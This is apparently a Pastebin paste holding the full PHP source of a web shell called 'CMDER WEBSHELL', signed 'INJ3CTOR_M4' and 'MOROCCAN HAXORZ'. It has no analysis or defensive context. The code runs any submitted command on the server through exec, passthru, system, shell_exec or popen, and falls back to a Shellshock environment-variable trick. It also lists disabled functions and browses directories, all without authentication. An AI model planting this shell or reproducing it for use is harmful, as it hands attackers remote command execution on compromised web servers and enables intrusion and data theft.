Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title>Made In Morocco</title>
- <style>
- input,select,textarea {
- border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
- }
- </style>
- <center>
- <table border='1' width='%70' cellpadding='5'>
- <tr><td align='center'><i><b><font size='2' face='Courier'>#CMDER WEBSHELL</font></b></i></td></tr>
- <tr><td align='center'><img src="https://powersthatbeat.files.wordpress.com/2011/05/photo8.jpg"></td></tr>
- <?php
- #CMDER // BY INJ3CTOR_M4
- set_time_limit(0);
- error_reporting(0);
- // FILE MANAGER
- if(!empty($_GET['path'])) {
- $cmd = trim($_GET['path']);
- chdir($cmd);
- }
- // CMDER DESGIN
- echo'<tr><td align="center"><b><font size="2" face="Courier">UNAME:</b> '.php_uname().'</font></td></tr>';
- echo'<tr><td align="center"><b><font size="2" face="Courier">PWD:</b> '.getcwd().'</font><form method="GET">
- <input type="text" name="path" value="'.getcwd().'">
- <input type="submit" value="CHANGE">
- </form><font size="2" face="Courier"><b>DISABLE_FUNCTION:</b> <u>'.@showdisablefunctions().'</u></font></td></tr>';
- echo'<tr><td align="center">
- <form method="POST">
- <font size="2" face="Courier">Command:</font><br />
- <input type="text" size="30" name="Command" value="uname -a">
- <input type="submit" value="EXEC">
- </form>
- </td></tr>';
- if(!empty($_POST['Command'])) {
- $cmd = trim($_POST['Command']);
- echo'<tr><td align="center">';
- echo'<textarea style="width: 926px; height: 382px;">';
- echo m4Ex($cmd);
- echo'</textarea><br />';
- }
- echo'<tr><td align="center"><font size="6" color="#051F53">MOROCCAN HAXORZ</font></td></tr>';
- // FUNCTIONS
- function showdisablefunctions() {
- if ($disablefunc=@ini_get("disable_functions")){
- return "<font color=red><b>".$disablefunc."</b></font>";
- }else{
- return "<font color=green><b>NONE</b></b></font>";
- }
- }
- function m4Ex($in) {
- $out = '';
- if (function_exists('exec')) {
- @exec($in,$out);
- $out = @join("\n",$out);
- } elseif (function_exists('passthru')) {
- ob_start();
- @passthru($in);
- $out = ob_get_clean();
- } elseif (function_exists('system')) {
- ob_start();
- @system($in);
- $out = ob_get_clean();
- } elseif (function_exists('shell_exec')) {
- $out = shell_exec($in);
- } elseif (is_resource($f = @popen($in,"r"))) {
- $out = "";
- while(!@feof($f))
- $out .= fread($f,1024);
- pclose($f);
- } else {
- $out = shellshock($in);
- }
- return $out;
- }
- function shellshock($cmd) {
- if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
- $tmp = tempnam(".","data");
- putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
- }
- else return "Not vuln (not bash)";
- $output = @file_get_contents($tmp);
- @unlink($tmp);
- if($output != "") return $output;
- else return "No output, or not vuln.";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment